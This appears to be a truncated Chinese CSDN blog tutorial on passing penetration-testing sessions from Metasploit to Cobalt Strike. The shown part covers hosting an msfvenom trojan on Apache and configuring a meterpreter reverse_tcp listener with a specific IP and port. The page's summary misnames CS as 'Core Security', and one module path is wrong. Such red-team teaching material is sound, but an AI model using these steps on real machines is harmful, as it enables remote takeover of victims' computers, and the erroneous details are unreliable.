内网渗透中metasploit与cs之间的会话转交

本文详细介绍了在内网渗透过程中如何将Metasploit的会话转交给CS(Core Security)进行后续操作。通过在Kali Linux上创建木马文件、设置Apache2服务器、配置Metasploit的multi/handler模块,以及在CS中创建监听器和转接模块,最终实现两个工具间的会话转接。
摘要由CSDN通过智能技术生成

内网渗透中metasploit与cs之间的会话转交


`注:若有侵权请联系删除


前言

在内网渗透中,metasploit与cs往往是联合使用的,其意义与重要性不言而喻,涉及到很多后期操作例如联合提权,那么其二者之间会话的转交就是这一切后期操作的根本了


这里监听机为kali2021.4版,靶机为win10

一、metasploit–>cs

1. 利用msfvenom创建一个木马文件ikun.exe在目录/var/www/html/下(方便靶机下载运行木马)

在这里插入图片描述

2. 开启Apache2

service apache2 start

3. 开启msfconsole并使用 exploit/multi/handler模块

use exploit/multi/handler/reverse_tcp

4. 查看配置并进行配置

4.1查看配置

show options

4.2配置监听端口(原来木马的生成端口)和本地监听地址(本机内网IP地址)及payload(木马生成payload)

set lport 8888
set lhost 192.168.43.75
set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

  • 12
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值